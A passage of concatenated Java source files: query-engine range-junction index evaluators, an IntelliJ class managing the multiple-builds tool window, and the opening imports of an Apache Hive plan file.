nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
} else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType) : new SortedResultsBag(resultType,
nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif : First obtain the match level of index resultset. If the match
* level happens to be zero , this implies that we just have to change the
* StructType ( again if only the Index resultset is a StructBag). If the
* match level is zero & expand to to top level flag is true & iff the
* total no. of iterators in current scope is greater than the no. of
* fields in StructBag , then only we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index,
OQLLexerTokenTypes.TOK_NE, this.notEqualTypeKeys);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(set, notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
public Object evaluate(ExecutionContext context) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
return evaluate(context,evaluatedPath);
}
public boolean isConditioningNeededForIndex(RuntimeIterator independentIter, ExecutionContext context, boolean completeExpnsNeeded) throws AmbiguousNameException, TypeMismatchException, NameResolutionException {
return true;
}
public Object evaluate(ExecutionContext context, Object evaluatedPath) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Iterator itr = this.notEqualTypeKeys.iterator();
while(itr.hasNext()) {
Object val = itr.next();
Object result = TypeUtils.compare(evaluatedPath, val, TOK_NE);
if( result instanceof Boolean) {
if( !((Boolean)result).booleanValue()) {
return Boolean.FALSE;
}
}else {
throw new TypeMismatchException("NotEqualConditionEvaluator should evaluate to boolean type");
}
}
return Boolean.TRUE;
}
public int getType() {
return NOTEQUALCONDITIONEVALUATOR;
}
public int getSizeEstimate(ExecutionContext context) {
return RANGE_SIZE_ESTIMATE;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
public int getOperator()
{
return LITERAL_and;
}
public boolean isBetterFilter(Filter comparedTo, ExecutionContext context, int thisSize) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException
{
//If the current filter is equality & comparedTo filter is also equality based , then
// return the one with lower size estimate is better
boolean isThisBetter = true;
int thatOperator = comparedTo.getOperator() ;
//Go with the lowest cost when hint is used.
if (context instanceof QueryExecutionContext && ((QueryExecutionContext)context).hasHints()) {
return thisSize <= comparedTo.getSizeEstimate(context);
}
switch(thatOperator) {
case TOK_EQ:
isThisBetter = false;
break;
case TOK_NE:
case TOK_NE_ALT:
//Give preference to Range
break;
default :
throw new IllegalArgumentException("The operator type ="+ thatOperator + " is unknown");
}
return isThisBetter;
}
}
/**
* Filter object of this type gets created if there exists atleast one "NOT
* EQUAL" type condition and a single condition containing an inequality of
* type 'Less' or 'Greater'. The Where clause may actually contain multiple
* 'Less' type inequality or multiple 'Greater' type inequality ( though not
* both 'Less' and 'Greater' together). The RangeJunction will identify the
* most specific inequality for the AND junction. Thus if something like a > 7
* and a >=6 , will be sufficiently represented by a > 7
*
* @author asif
*
*/
private static class SingleCondnEvaluator extends NotEqualConditionEvaluator {
protected int condnOp = -1;
protected final Object condnKey;
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
/**
*
* @param operator
* integer identifying the type of 'Less' or 'Greater'
* inequality
* @param key
* Object representing the Key for the inequality
* @param notEqualKeys
* Set containing the 'NOT EQUAL' Keys accompanying the
* 'Less' or 'Greater' inequality
* @param indxInfo
* The IndexInfo object corresponding to the RangeJunction
*/
SingleCondnEvaluator(int operator, Object key, Set notEqualKeys,
IndexInfo indxInfo) {
super(notEqualKeys, indxInfo);
this.condnOp = operator;
this.condnKey = key;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs,
boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
} else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType) : new SortedResultsBag(resultType,
nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif : First obtain the match level of index resultset. If the match
* level happens to be zero , this implies that we just have to change the
* StructType ( again if only the Index resultset is a StructBag). If the
* match level is zero & expand to to top level flag is true & iff the
* total no. of iterators in current scope is greater than the no. of
* fields in StructBag , then only we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index, this.condnOp,
this.condnKey);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(this.condnKey, this.condnOp, set,
notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
public Object evaluate(ExecutionContext context) throws TypeMismatchException, FunctionDomainException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
Boolean result =(Boolean) super.evaluate(context,evaluatedPath);
if( result.booleanValue()) {
result = (Boolean)TypeUtils.compare(evaluatedPath, this.condnKey, this.condnOp);
}
return result;
}
@Override
public int getType() {
return SINGLECONDNEVALUATOR;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
}
/**
* Filter object of this type gets created if there exists a bounded condition
* like a >7 and a > 8 and a< 10 and a <11. The RangeJunction will identify
* the most specific inequality of each type for the AND junction. Thus the
* conditions a > 8 and a <10 will be used to form the Object of this class.
* For this evaluator only, the notEqualTypeKeys present in its super class
* may be null ( if there is no 'NOT EQUAL' type condition satisfying the
* bounded condition)
*
* @author ashahid
*
*/
private static class DoubleCondnRangeJunctionEvaluator extends
NotEqualConditionEvaluator {
protected final int lessCondnOp;
protected final int greaterCondnOp;
protected final Object lessCondnKey;
protected final Object greaterCondnKey;
/**
*
* @param lessCondnOp
* integer identifying the upper bound ( < or <= )
* @param lessCondnKey
* Object representing the Upper Bound Key
* @param greaterCondnOp
* integer identifying the lower bound ( > or >= )
* @param greaterCondnKey
* Object representing the lower Bound Key
* @param notEqualTypeKeys
* Set containing the 'NOT EQUAL' Keys accompanying the
* 'Less' or 'Greater' inequality
* @param indexInfo
* The IndexInfo object corresponding to the RangeJunction
*/
DoubleCondnRangeJunctionEvaluator(int lessCondnOp, Object lessCondnKey,
int greaterCondnOp, Object greaterCondnKey, Set notEqualTypeKeys,
IndexInfo indexInfo) {
super(notEqualTypeKeys, indexInfo);
this.lessCondnOp = lessCondnOp;
this.lessCondnKey = lessCondnKey;
this.greaterCondnOp = greaterCondnOp;
this.greaterCondnKey = greaterCondnKey;
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
@Override
public SelectResults filterEvaluate(ExecutionContext context,
SelectResults iterationLimit, boolean completeExpansionNeeded,
CompiledValue iterOperands, RuntimeIterator[] indpndntItrs,
boolean isIntersection,boolean conditioningNeeded, boolean evalProj)
throws FunctionDomainException, TypeMismatchException,
NameResolutionException, QueryInvocationTargetException {
ObjectType resultType = this.indxInfo._index.getResultSetType();
int indexFieldsSize = -1;
SelectResults set = null;
Boolean orderByClause = (Boolean)context.cacheGet(CompiledValue.CAN_APPLY_ORDER_BY_AT_INDEX);
boolean useLinkedDataStructure = false;
boolean nullValuesAtStart = true;
if(orderByClause != null && orderByClause.booleanValue()) {
List orderByAttrs = (List)context.cacheGet(CompiledValue.ORDERBY_ATTRIB);
useLinkedDataStructure =orderByAttrs.size()==1;
nullValuesAtStart = !((CompiledSortCriterion)orderByAttrs.get(0)).getCriterion();
}
if (resultType instanceof StructType) {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"StructType resultType.class=" + resultType.getClass().getName());
}
if(useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedStructSet((StructTypeImpl)resultType)
: new SortedResultsBag<Struct>((StructTypeImpl)resultType, nullValuesAtStart);
}else {
set = QueryUtils.createStructCollection(context, (StructTypeImpl)resultType) ;
}
indexFieldsSize = ((StructTypeImpl)resultType).getFieldNames().length;
}
else {
if (context.getCache().getLogger().fineEnabled()) {
context.getCache().getLogger().fine(
"non-StructType resultType.class="
+ resultType.getClass().getName());
}
if (useLinkedDataStructure) {
set = context.isDistinct() ? new LinkedResultSet(resultType):
new SortedResultsBag(resultType, nullValuesAtStart);
} else {
set = QueryUtils.createResultCollection(context, resultType);
}
indexFieldsSize = 1;
}
// actual index lookup
// Shobhit: Limit can not be applied at index level for RangeJunction as
// other conditions are applied after coming out of index query method.
context.cachePut(CompiledValue.CAN_APPLY_LIMIT_AT_INDEX, Boolean.FALSE);
QueryObserver observer = QueryObserverHolder.getInstance();
/*
* Asif : First obtain the match level of index resultset. If the match
* level happens to be zero , this implies that we just have to change the
* StructType ( again if only the Index resultset is a StructBag). If the
* match level is zero & expand to to top level flag is true & iff the
* total no. of iterators in current scope is greater than the no. of
* fields in StructBag , then only we need to do any expansion.
*
*/
try {
observer.beforeIndexLookup(this.indxInfo._index, this.greaterCondnOp,
this.greaterCondnKey, this.lessCondnOp, this.lessCondnKey,
this.notEqualTypeKeys);
context.cachePut(CompiledValue.INDEX_INFO, this.indxInfo);
this.indxInfo._index.query(this.greaterCondnKey, this.greaterCondnOp,
this.lessCondnKey, this.lessCondnOp, set, notEqualTypeKeys, context);
}
finally {
observer.afterIndexLookup(set);
}
return QueryUtils.getconditionedIndexResults(set, this.indxInfo, context,
indexFieldsSize, completeExpansionNeeded, iterOperands, indpndntItrs);
}
@Override
public SelectResults auxFilterEvaluate(ExecutionContext context,
SelectResults intermediateResults) throws FunctionDomainException,
TypeMismatchException, NameResolutionException,
QueryInvocationTargetException {
throw new UnsupportedOperationException();
}
public Object evaluate(ExecutionContext context) throws FunctionDomainException, TypeMismatchException, NameResolutionException, QueryInvocationTargetException {
Object evaluatedPath = this.indxInfo._path.evaluate(context);
Boolean result =(Boolean) super.evaluate(context,evaluatedPath);
if( result.booleanValue()) {
result = (Boolean)TypeUtils.compare(evaluatedPath, this.lessCondnKey, this.lessCondnOp);
result = result.booleanValue() ? (Boolean)TypeUtils.compare(evaluatedPath, this.greaterCondnKey, this.greaterCondnOp):Boolean.FALSE;
}
return result;
}
@Override
public int getType() {
return DOUBLECONDNRANGEJUNCTIONEVALUATOR;
}
@Override
public void visitNodes(NodeVisitor visitor) {
Support.assertionFailed("Should not have come here");
}
}
}
|
|
// Copyright 2000-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.intellij.build;
import com.intellij.build.events.*;
import com.intellij.execution.process.AnsiEscapeDecoder;
import com.intellij.execution.process.ProcessOutputTypes;
import com.intellij.execution.ui.RunContentDescriptor;
import com.intellij.ide.IdeBundle;
import com.intellij.ide.OccurenceNavigator;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.actionSystem.ActionManager;
import com.intellij.openapi.actionSystem.ActionToolbar;
import com.intellij.openapi.actionSystem.DefaultActionGroup;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.ui.OnePixelDivider;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.Pair;
import com.intellij.openapi.wm.ToolWindow;
import com.intellij.ui.OnePixelSplitter;
import com.intellij.ui.SimpleColoredComponent;
import com.intellij.ui.SimpleTextAttributes;
import com.intellij.ui.components.JBList;
import com.intellij.ui.components.JBScrollPane;
import com.intellij.ui.content.Content;
import com.intellij.ui.content.impl.ContentImpl;
import com.intellij.util.Alarm;
import com.intellij.util.SmartList;
import com.intellij.util.concurrency.EdtExecutorService;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.util.ui.EmptyIcon;
import com.intellij.util.ui.JBUI;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.ApiStatus;
import org.jetbrains.annotations.NonNls;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import javax.swing.event.ListSelectionEvent;
import javax.swing.event.ListSelectionListener;
import java.awt.*;
import java.util.List;
import java.util.*;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.function.Function;
import java.util.function.Supplier;
import java.util.stream.IntStream;
/**
* @author Vladislav.Soroka
*/
@ApiStatus.Experimental
public class MultipleBuildsView implements BuildProgressListener, Disposable {
private static final Logger LOG = Logger.getInstance(MultipleBuildsView.class);
@NonNls private static final String SPLITTER_PROPERTY = "MultipleBuildsView.Splitter.Proportion";
protected final Project myProject;
protected final BuildContentManager myBuildContentManager;
private final AtomicBoolean isInitializeStarted;
private final AtomicBoolean isFirstErrorShown = new AtomicBoolean();
private final List<Runnable> myPostponedRunnables;
private final ProgressWatcher myProgressWatcher;
private final OnePixelSplitter myThreeComponentsSplitter;
private final JBList<AbstractViewManager.BuildInfo> myBuildsList;
private final Map<Object, AbstractViewManager.BuildInfo> myBuildsMap;
private final Map<AbstractViewManager.BuildInfo, BuildView> myViewMap;
private final AbstractViewManager myViewManager;
private volatile Content myContent;
private volatile DefaultActionGroup myToolbarActions;
private volatile boolean myDisposed;
public MultipleBuildsView(Project project,
BuildContentManager buildContentManager,
AbstractViewManager viewManager) {
myProject = project;
myBuildContentManager = buildContentManager;
myViewManager = viewManager;
isInitializeStarted = new AtomicBoolean();
myPostponedRunnables = ContainerUtil.createConcurrentList();
myThreeComponentsSplitter = new OnePixelSplitter(SPLITTER_PROPERTY, 0.25f);
myBuildsList = new JBList<>();
myBuildsList.setModel(new DefaultListModel<>());
myBuildsList.setFixedCellHeight(UIUtil.LIST_FIXED_CELL_HEIGHT * 2);
AnsiEscapeDecoder ansiEscapeDecoder = new AnsiEscapeDecoder();
myBuildsList.installCellRenderer(obj -> {
JPanel panel = new JPanel(new BorderLayout());
SimpleColoredComponent mainComponent = new SimpleColoredComponent();
mainComponent.setIcon(obj.getIcon());
mainComponent.append(obj.getTitle() + ": ", SimpleTextAttributes.REGULAR_BOLD_ATTRIBUTES);
mainComponent.append(obj.message, SimpleTextAttributes.REGULAR_ATTRIBUTES);
panel.add(mainComponent, BorderLayout.NORTH);
if (obj.statusMessage != null) {
SimpleColoredComponent statusComponent = new SimpleColoredComponent();
statusComponent.setIcon(EmptyIcon.ICON_16);
ansiEscapeDecoder.escapeText(obj.statusMessage, ProcessOutputTypes.STDOUT, (text, attributes) -> {
statusComponent.append(text, SimpleTextAttributes.REGULAR_ATTRIBUTES); //NON-NLS
});
panel.add(statusComponent, BorderLayout.SOUTH);
}
return panel;
});
myViewMap = new ConcurrentHashMap<>();
myBuildsMap = new ConcurrentHashMap<>();
myProgressWatcher = new ProgressWatcher();
}
@Override
public void dispose() {
myDisposed = true;
}
public Content getContent() {
return myContent;
}
public Map<BuildDescriptor, BuildView> getBuildsMap() {
return Collections.unmodifiableMap(myViewMap);
}
public boolean shouldConsume(@NotNull Object buildId) {
return myBuildsMap.containsKey(buildId);
}
@Override
public void onEvent(@NotNull Object buildId, @NotNull BuildEvent event) {
List<Runnable> runOnEdt = new SmartList<>();
AbstractViewManager.BuildInfo buildInfo;
if (event instanceof StartBuildEvent) {
StartBuildEvent startBuildEvent = (StartBuildEvent)event;
if (isInitializeStarted.get()) {
clearOldBuilds(runOnEdt, startBuildEvent);
}
buildInfo = new AbstractViewManager.BuildInfo(((StartBuildEvent)event).getBuildDescriptor());
myBuildsMap.put(buildId, buildInfo);
}
else {
buildInfo = myBuildsMap.get(buildId);
}
if (buildInfo == null) {
LOG.warn("Build can not be found for buildId: '" + buildId + "'");
return;
}
runOnEdt.add(() -> {
if (event instanceof StartBuildEvent) {
buildInfo.message = event.getMessage();
DefaultListModel<AbstractViewManager.BuildInfo> listModel =
(DefaultListModel<AbstractViewManager.BuildInfo>)myBuildsList.getModel();
listModel.addElement(buildInfo);
RunContentDescriptor contentDescriptor;
Supplier<? extends RunContentDescriptor> contentDescriptorSupplier = buildInfo.getContentDescriptorSupplier();
contentDescriptor = contentDescriptorSupplier != null ? contentDescriptorSupplier.get() : null;
final Runnable activationCallback;
if (contentDescriptor != null) {
buildInfo.setActivateToolWindowWhenAdded(contentDescriptor.isActivateToolWindowWhenAdded());
if (contentDescriptor instanceof BuildContentDescriptor) {
buildInfo.setActivateToolWindowWhenFailed(((BuildContentDescriptor)contentDescriptor).isActivateToolWindowWhenFailed());
}
buildInfo.setAutoFocusContent(contentDescriptor.isAutoFocusContent());
activationCallback = contentDescriptor.getActivationCallback();
}
else {
activationCallback = null;
}
BuildView view = myViewMap.computeIfAbsent(buildInfo, info -> {
String selectionStateKey = "build.toolwindow." + myViewManager.getViewName() + ".selection.state";
BuildView buildView = new BuildView(myProject, buildInfo, selectionStateKey, myViewManager);
Disposer.register(this, buildView);
if (contentDescriptor != null) {
Disposer.register(buildView, contentDescriptor);
}
return buildView;
});
view.onEvent(buildId, event);
myContent.setPreferredFocusedComponent(view::getPreferredFocusableComponent);
myBuildContentManager.setSelectedContent(myContent,
buildInfo.isAutoFocusContent(),
buildInfo.isAutoFocusContent(),
buildInfo.isActivateToolWindowWhenAdded(),
activationCallback);
buildInfo.content = myContent;
if (myThreeComponentsSplitter.getSecondComponent() == null) {
myThreeComponentsSplitter.setSecondComponent(view);
myViewManager.configureToolbar(myToolbarActions, this, view);
}
if (myBuildsList.getModel().getSize() > 1) {
JBScrollPane scrollPane = new JBScrollPane();
scrollPane.setBorder(JBUI.Borders.empty());
scrollPane.setViewportView(myBuildsList);
myThreeComponentsSplitter.setFirstComponent(scrollPane);
myBuildsList.setVisible(true);
myBuildsList.setSelectedIndex(0);
for (BuildView consoleView : myViewMap.values()) {
BuildTreeConsoleView buildConsoleView = consoleView.getView(BuildTreeConsoleView.class.getName(), BuildTreeConsoleView.class);
if (buildConsoleView != null) {
buildConsoleView.hideRootNode();
}
}
}
else {
myThreeComponentsSplitter.setFirstComponent(null);
}
myViewManager.onBuildStart(buildInfo);
myProgressWatcher.addBuild(buildInfo);
((BuildContentManagerImpl)myBuildContentManager).startBuildNotified(buildInfo, buildInfo.content, buildInfo.getProcessHandler());
}
else {
if (!isFirstErrorShown.get() &&
(event instanceof FinishEvent && ((FinishEvent)event).getResult() instanceof FailureResult) ||
(event instanceof MessageEvent && ((MessageEvent)event).getResult().getKind() == MessageEvent.Kind.ERROR)) {
if (isFirstErrorShown.compareAndSet(false, true)) {
ListModel<AbstractViewManager.BuildInfo> listModel = myBuildsList.getModel();
IntStream.range(0, listModel.getSize())
.filter(i -> buildInfo == listModel.getElementAt(i))
.findFirst()
.ifPresent(myBuildsList::setSelectedIndex);
}
}
BuildView view = myViewMap.get(buildInfo);
if (view != null) {
view.onEvent(buildId, event);
}
if (event instanceof FinishBuildEvent) {
buildInfo.endTime = event.getEventTime();
buildInfo.message = event.getMessage();
buildInfo.result = ((FinishBuildEvent)event).getResult();
myProgressWatcher.stopBuild(buildInfo);
((BuildContentManagerImpl)myBuildContentManager).finishBuildNotified(buildInfo, buildInfo.content);
myViewManager.onBuildFinish(buildInfo);
}
else {
buildInfo.statusMessage = event.getMessage();
}
}
});
if (myContent == null) {
myPostponedRunnables.addAll(runOnEdt);
if (isInitializeStarted.compareAndSet(false, true)) {
EdtExecutorService.getInstance().execute(() -> {
if (myDisposed) return;
myBuildsList.setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
myBuildsList.addListSelectionListener(new ListSelectionListener() {
@Override
public void valueChanged(ListSelectionEvent e) {
AbstractViewManager.BuildInfo selectedBuild = myBuildsList.getSelectedValue();
if (selectedBuild == null) return;
BuildView view = myViewMap.get(selectedBuild);
JComponent lastComponent = myThreeComponentsSplitter.getSecondComponent();
if (view != null && lastComponent != view.getComponent()) {
myThreeComponentsSplitter.setSecondComponent(view.getComponent());
view.getComponent().setVisible(true);
if (lastComponent != null) {
lastComponent.setVisible(false);
}
myViewManager.configureToolbar(myToolbarActions, MultipleBuildsView.this, view);
view.getComponent().repaint();
}
}
});
final JComponent consoleComponent = new MultipleBuildsPanel();
consoleComponent.add(myThreeComponentsSplitter, BorderLayout.CENTER);
myToolbarActions = new DefaultActionGroup();
ActionToolbar tb = ActionManager.getInstance().createActionToolbar("BuildView", myToolbarActions, false);
tb.setTargetComponent(consoleComponent);
tb.getComponent().setBorder(JBUI.Borders.merge(tb.getComponent().getBorder(), JBUI.Borders.customLine(OnePixelDivider.BACKGROUND, 0, 0, 0, 1), true));
consoleComponent.add(tb.getComponent(), BorderLayout.WEST);
myContent = new ContentImpl(consoleComponent, myViewManager.getViewName(), true);
Disposer.register(myContent, new Disposable() {
@Override
public void dispose() {
Disposer.dispose(MultipleBuildsView.this);
}
});
Disposer.register(myContent, new Disposable() {
@Override
public void dispose() {
myViewManager.onBuildsViewRemove(MultipleBuildsView.this);
}
});
Icon contentIcon = myViewManager.getContentIcon();
if (contentIcon != null) {
myContent.setIcon(contentIcon);
myContent.putUserData(ToolWindow.SHOW_CONTENT_ICON, Boolean.TRUE);
}
myBuildContentManager.addContent(myContent);
List<Runnable> postponedRunnables = new ArrayList<>(myPostponedRunnables);
myPostponedRunnables.clear();
for (Runnable postponedRunnable : postponedRunnables) {
postponedRunnable.run();
}
});
}
}
else {
EdtExecutorService.getInstance().execute(() -> {
if (myDisposed) return;
for (Runnable runnable : runOnEdt) {
runnable.run();
}
});
}
}
private void clearOldBuilds(List<Runnable> runOnEdt, StartBuildEvent startBuildEvent) {
long currentTime = System.currentTimeMillis();
DefaultListModel<AbstractViewManager.BuildInfo> listModel = (DefaultListModel<AbstractViewManager.BuildInfo>)myBuildsList.getModel();
boolean clearAll = !listModel.isEmpty();
List<AbstractViewManager.BuildInfo> sameBuildsToClear = new SmartList<>();
for (int i = 0; i < listModel.getSize(); i++) {
AbstractViewManager.BuildInfo build = listModel.getElementAt(i);
boolean sameBuild = build.getWorkingDir().equals(startBuildEvent.getBuildDescriptor().getWorkingDir());
if (!build.isRunning() && sameBuild) {
sameBuildsToClear.add(build);
}
boolean buildFinishedRecently = currentTime - build.endTime < TimeUnit.SECONDS.toMillis(1);
if (build.isRunning() || !sameBuild && buildFinishedRecently) {
clearAll = false;
}
}
if (clearAll) {
myBuildsMap.clear();
SmartList<BuildView> viewsToDispose = new SmartList<>(myViewMap.values());
runOnEdt.add(() -> viewsToDispose.forEach(Disposer::dispose));
myViewMap.clear();
listModel.clear();
runOnEdt.add(() -> {
myBuildsList.setVisible(false);
myThreeComponentsSplitter.setFirstComponent(null);
myThreeComponentsSplitter.setSecondComponent(null);
});
myToolbarActions.removeAll();
isFirstErrorShown.set(false);
}
else {
sameBuildsToClear.forEach(info -> {
BuildView buildView = myViewMap.remove(info);
if (buildView != null) {
runOnEdt.add(() -> Disposer.dispose(buildView));
}
listModel.removeElement(info);
});
}
}
@ApiStatus.Internal
public BuildView getBuildView(Object buildId) {
AbstractViewManager.BuildInfo buildInfo = myBuildsMap.get(buildId);
if (buildInfo == null) return null;
return myViewMap.get(buildInfo);
}
private class MultipleBuildsPanel extends JPanel implements OccurenceNavigator {
MultipleBuildsPanel() {super(new BorderLayout());}
@Override
public boolean hasNextOccurence() {
return getOccurenceNavigator(true) != null;
}
private @Nullable Pair<Integer, Supplier<OccurenceInfo>> getOccurenceNavigator(boolean next) {
if (myBuildsList.getItemsCount() == 0) return null;
int index = Math.max(myBuildsList.getSelectedIndex(), 0);
Function<Integer, Pair<Integer, Supplier<OccurenceInfo>>> function = i -> {
AbstractViewManager.BuildInfo buildInfo = myBuildsList.getModel().getElementAt(i);
BuildView buildView = myViewMap.get(buildInfo);
if (buildView == null) return null;
if (i != index) {
BuildTreeConsoleView eventView = buildView.getEventView();
if (eventView == null) return null;
eventView.getTree().clearSelection();
}
if (next) {
if (buildView.hasNextOccurence()) return Pair.create(i, buildView::goNextOccurence);
}
else {
if (buildView.hasPreviousOccurence()) {
return Pair.create(i, buildView::goPreviousOccurence);
}
else if (i != index && buildView.hasNextOccurence()) {
return Pair.create(i, buildView::goNextOccurence);
}
}
return null;
};
if (next) {
for (int i = index; i < myBuildsList.getItemsCount(); i++) {
Pair<Integer, Supplier<OccurenceInfo>> buildViewPair = function.apply(i);
if (buildViewPair != null) return buildViewPair;
}
}
else {
for (int i = index; i >= 0; i--) {
Pair<Integer, Supplier<OccurenceInfo>> buildViewPair = function.apply(i);
if (buildViewPair != null) return buildViewPair;
}
}
return null;
}
@Override
public boolean hasPreviousOccurence() {
return getOccurenceNavigator(false) != null;
}
@Override
public OccurenceInfo goNextOccurence() {
Pair<Integer, Supplier<OccurenceInfo>> navigator = getOccurenceNavigator(true);
if (navigator != null) {
myBuildsList.setSelectedIndex(navigator.first);
return navigator.second.get();
}
return null;
}
@Override
public OccurenceInfo goPreviousOccurence() {
Pair<Integer, Supplier<OccurenceInfo>> navigator = getOccurenceNavigator(false);
if (navigator != null) {
myBuildsList.setSelectedIndex(navigator.first);
return navigator.second.get();
}
return null;
}
@Override
public @NotNull String getNextOccurenceActionName() {
return IdeBundle.message("action.next.problem");
}
@Override
public @NotNull String getPreviousOccurenceActionName() {
return IdeBundle.message("action.previous.problem");
}
}
private class ProgressWatcher implements Runnable {
private final Alarm myRefreshAlarm = new Alarm(Alarm.ThreadToUse.SWING_THREAD);
private final Set<AbstractViewManager.BuildInfo> myBuilds = ContainerUtil.newConcurrentSet();
@Override
public void run() {
myRefreshAlarm.cancelAllRequests();
JComponent firstComponent = myThreeComponentsSplitter.getFirstComponent();
if (firstComponent != null) {
firstComponent.revalidate();
firstComponent.repaint();
}
if (!myBuilds.isEmpty()) {
myRefreshAlarm.addRequest(this, 300);
}
}
void addBuild(AbstractViewManager.BuildInfo buildInfo) {
myBuilds.add(buildInfo);
if (myBuilds.size() > 1) {
myRefreshAlarm.cancelAllRequests();
myRefreshAlarm.addRequest(this, 300);
}
}
void stopBuild(AbstractViewManager.BuildInfo buildInfo) {
myBuilds.remove(buildInfo);
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hive.ql.plan;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.LinkedHashMap;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import org.apache.commons.logging.Log;
